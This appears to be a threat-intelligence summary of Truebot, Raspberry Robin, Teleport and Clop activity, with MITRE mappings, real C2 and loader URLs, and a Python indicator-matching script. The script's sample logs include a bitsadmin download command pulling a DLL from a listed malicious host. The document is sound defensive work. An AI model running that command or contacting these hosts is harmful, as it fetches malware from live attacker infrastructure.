Since August 2022, Truebot (Silence.Downloader) infections have surged, with two botnets observed: a globally distributed one (notably targeting Mexico, Brazil, and Pakistan) and a newer US-focused botnet impacting Windows servers and several education-sector organizations. The campaigns tie Netwrix Auditor CVE-2022-31199 exploitation, Raspberry Robin-delivered Truebot, and a custom data-exfiltration tool called Teleport to post-compromise activity that also involves Grace and Cobalt Strike payloads and Clop ransomware. #Truebot #SilenceGroup #TA505 #RaspberryRobin #Grace #Teleport #Clop
Key points
- Two Truebot botnets identified: a global distribution with focus on Mexico, Brazil, and Pakistan, and a newer US-focused botnet targeting Windows servers (often internet-exposed) and some education-sector targets.
- Netwrix Auditor vulnerability CVE-2022-31199 was used as an entry vector; because the product is rarely exposed to the internet, the number of initial compromises through this route was likely limited.
- Raspberry Robin emerged as a major delivery mechanism, enabling Truebot infections via USB and contributing to a large botnet footprint.
- Post-compromise activity includes data exfiltration using a custom tool named Teleport, which encrypts traffic and collects targeted data (screenshot, computer name, local network name, AD trust relations).
- Grace and Cobalt Strike payloads (including PowerShell-based delivery and a Grace packer) were dropped after Truebot compromise, suggesting TA505-related tooling.
- Clop ransomware is used in a broader operation, with attackers leveraging Teleport-enabled data collection and scheduled tasks to encrypt large data volumes.
- Defensive guidance highlights Cisco security products and general indicators of compromise to detect and block these campaigns.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by Bishop Fox.
- [T1105] Ingress Tool Transfer – Truebot drops and transfers payloads during initial access and post-compromise exploitation.
- [T1197] BITS Jobs – The attack leveraged BITS to download payloads (BITS-based download/execution).
- [T1059.003] Windows Command Shell – Execution via the Windows command shell, observed in bitsadmin usage.
- [T1021.001] SMB – Lateral movement via exposed Windows services, notably SMB.
- [T1053] Scheduled Task – Creation of scheduled tasks to run Clop ransomware across many systems.
- [T1082] System Information Discovery – Data collection includes system information (screenshot, computer name, local network name, AD trust relations).
- [T1055] Process Injection – In-memory loading/execution of additional modules and shellcode.
- [T1486] Data Encrypted for Impact – Clop ransomware encrypts data as part of a double-extortion scenario.
- [T1041] Exfiltration Over C2 Channel – Custom exfiltration (Teleport) sending data to attacker-controlled C2.
Indicators of Compromise
- [Domain] Gate endpoints (C2) – nefosferta.com/gate.php, gbpooolfhbrb.com/gate.php
- [IP] Network-facing endpoints – 185.55.243.110/gate.php, 88.214.27.100/gate.php
- [Hash] Download/sample payloads – 092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875, dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4
- [File] Truebot-related binaries – UAVRServer.exe, msruntime.dll
- [URL] Download/loader URLs – http://179.60.150.34:80/download/file.ext, http://tddshht.com/chkds.dll
- [Tool] Teleport (custom data-exfiltration tool), Grace (GraceLoader) and related payloads
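The indicator list above is only useful once it is run against telemetry. The following added example (not from the Talos report, and not a Cisco or Talos tool) matches proxy and EDR log lines against the domains, IPs, hashes and file names listed here, and additionally flags a bitsadmin `/transfer` command line whose download URL points at one of those hosts (T1197). The key=value log format and the sample lines are constructed for the example; the `sha256`, `image`, `url` and `cmdline` field names are assumptions, not a real product schema.

```python
"""Match endpoint and proxy log lines against the Truebot indicators listed above."""
import re
from ntpath import basename
from typing import Dict, List
from urllib.parse import urlparse

# Indicators copied from the summary above, normalised to lowercase for comparison.
IOC_DOMAINS = {"nefosferta.com", "gbpooolfhbrb.com", "tddshht.com"}
IOC_IPS = {"185.55.243.110", "88.214.27.100", "179.60.150.34"}
IOC_SHA256 = {
    "092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875",
    "dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4",
}
IOC_FILENAMES = {"uavrserver.exe", "msruntime.dll"}

# Constructed sample log lines (assumed key=value format); not taken from the report.
SAMPLE_LOGS = [
    "2022-10-03T12:00:01Z type=proxy src=10.0.0.5 url=http://185.55.243.110/gate.php method=POST",
    "2022-10-03T12:00:07Z type=proxy src=10.0.0.5 url=https://nefosferta.com/gate.php method=POST",
    r"2022-10-03T12:01:15Z type=edr host=WS01 image=C:\ProgramData\UAVRServer.exe "
    "sha256=092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875",
    r'2022-10-03T12:02:40Z type=edr host=WS01 image=C:\Windows\System32\bitsadmin.exe '
    r'cmdline="bitsadmin /transfer job /download http://tddshht.com/chkds.dll C:\Users\Public\chkds.dll"',
    "2022-10-03T12:03:00Z type=proxy src=10.0.0.9 url=https://www.example.com/index.html method=GET",
]

# key=value pairs; values may be double-quoted (to allow spaces) or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line: str) -> Dict[str, str]:
    """Split a log line into its key=value fields."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in KV_RE.findall(line)}


def _host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def match_line(line: str) -> List[Dict[str, str]]:
    """Return one hit per indicator found in the line (empty list if clean)."""
    fields = parse_line(line)
    hits: List[Dict[str, str]] = []

    # C2 gate endpoints and download hosts, by domain or IP.
    url = fields.get("url")
    if url and _host_of(url) in IOC_DOMAINS | IOC_IPS:
        hits.append({"kind": "c2_host", "indicator": _host_of(url), "line": line})

    # Known sample hashes.
    sha = fields.get("sha256", "").lower()
    if sha in IOC_SHA256:
        hits.append({"kind": "sha256", "indicator": sha, "line": line})

    # Truebot-related binary names, compared on the file name only.
    image = basename(fields.get("image", "")).lower()
    if image in IOC_FILENAMES:
        hits.append({"kind": "filename", "indicator": image, "line": line})

    # T1197: bitsadmin /transfer pulling a payload from a known host.
    cmdline = fields.get("cmdline", "")
    if "bitsadmin" in cmdline.lower() and "/transfer" in cmdline.lower():
        for token in cmdline.split():
            if token.lower().startswith(("http://", "https://")) and _host_of(token) in IOC_DOMAINS | IOC_IPS:
                hits.append({"kind": "bits_transfer", "indicator": _host_of(token), "line": line})

    return hits


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run match_line over every line and flatten the results."""
    return [hit for line in lines for hit in match_line(line)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"{hit['kind']:<14} {hit['indicator']:<66} {hit['line'][:60]}")
```

The matcher compares URL hosts rather than raw substrings so that a benign page merely mentioning `gate.php` does not fire, and it compares only the basename of `image`, since the report gives file names rather than full install paths.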
Read more: https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/